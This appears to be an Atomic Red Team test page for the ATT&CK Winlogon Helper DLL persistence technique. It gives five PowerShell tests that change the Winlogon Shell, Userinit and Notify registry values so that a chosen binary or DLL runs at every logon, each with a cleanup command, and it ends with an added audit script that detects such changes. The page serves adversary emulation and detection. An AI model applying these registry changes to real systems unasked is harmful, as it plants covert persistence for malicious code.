T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL

Description from ATT&CK

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013) Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse:(Citation: Cylance Reg Persistence Sept 2013)

* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on

Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.

Atomic Tests


Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell

PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.

Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.

Supported Platforms: Windows

auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | path | C:\Windows\System32\cmd.exe |

Attack Commands: Run with `powershell`!

```powershell
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
```

Cleanup Commands:

```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
```



Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell

PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.

Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.

Supported Platforms: Windows

auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | path | C:\Windows\System32\cmd.exe |

Attack Commands: Run with `powershell`!

```powershell
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
```

Cleanup Commands:

```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
```



Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell

PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.

Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon.

Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008, so this test only applies to earlier versions of Windows.

Supported Platforms: Windows

auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of notification package to execute | path | C:\Windows\Temp\atomicNotificationPackage.dll |
| function_to_execute | Function in notification package to execute | string | AtomicTestFunction |

Attack Commands: Run with `powershell`!

```powershell
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force
```

Cleanup Commands:

```powershell
Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore
```



Atomic Test #4 - Winlogon HKLM Shell Key Persistence - PowerShell

PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.

Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.

Supported Platforms: Windows

auto_generated_guid: 95a3c42f-8c88-4952-ad60-13b81d929a9d

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | path | C:\Windows\System32\cmd.exe |

Attack Commands: Run with `powershell`!

```powershell
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
```

Cleanup Commands:

```powershell
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
```



Atomic Test #5 - Winlogon HKLM Userinit Key Persistence - PowerShell

PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.

Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.

Supported Platforms: Windows

auto_generated_guid: f9b8daff-8fa7-4e6a-a1a7-7c14675a545b

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | path | C:\Windows\System32\cmd.exe |

Attack Commands: Run with `powershell`!

```powershell
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
```

Cleanup Commands:

```powershell
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
```
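The following audit script is an added defender's counterpart to tests #1 through #5 and is not part of the Atomic Red Team page. It reads the Shell and Userinit values from the HKLM, Wow6432Node and HKCU Winlogon keys, splits them the way Winlogon does (comma-separated program list), compares them with assumed stock defaults, and lists any Notify subkeys; the expected default values and the function name Get-WinlogonAutostartFindings are assumptions.

```powershell
# Added example (not part of the Atomic Red Team page). Audits the Winlogon
# autostart values that tests #1-#5 modify and reports anything unexpected.
# Expected defaults are an assumption for a stock install; adjust them for
# images that legitimately customise the shell (kiosk builds, etc.).
$ExpectedDefaults = @{
    Shell    = @('explorer.exe')
    Userinit = @('C:\Windows\system32\userinit.exe')
}

function Get-WinlogonAutostartFindings {
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
        'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon',
        'HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    )
    foreach ($key in $keys) {
        if (-not (Test-Path -Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($name in 'Shell', 'Userinit') {
            $raw = $props.$name
            if ($null -eq $raw) { continue }   # value not present in this hive
            # Winlogon reads these values as a comma-separated program list, which
            # is what "explorer.exe, cmd.exe" in the tests relies on.
            $entries = $raw -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ }
            $extra = @($entries | Where-Object { $ExpectedDefaults[$name] -notcontains $_ })
            # Anything beyond the default, or any per-user (HKCU) override, is a finding
            if ($extra.Count -gt 0 -or $key -like 'HKCU:*') {
                [pscustomobject]@{
                    Key = $key; Value = $name; Data = $raw; Unexpected = ($extra -join ', ')
                }
            }
        }
        # Notify packages were removed in Vista / Server 2008, so on later versions
        # any subkey here (as created by test #3) is a red flag on its own
        $notify = Join-Path -Path $key -ChildPath 'Notify'
        if (Test-Path -Path $notify) {
            foreach ($sub in Get-ChildItem -Path $notify) {
                $p = Get-ItemProperty -Path $sub.PSPath
                [pscustomobject]@{
                    Key = $sub.PSPath; Value = 'DllName'; Data = $p.DllName
                    Unexpected = "Notify package (Logon=$($p.Logon))"
                }
            }
        }
    }
}

Get-WinlogonAutostartFindings | Format-Table -AutoSize -Wrap
```

After running one of the tests above, the Data column shows the full comma-separated value and Unexpected isolates the appended program; running the test's cleanup command should make the finding disappear again.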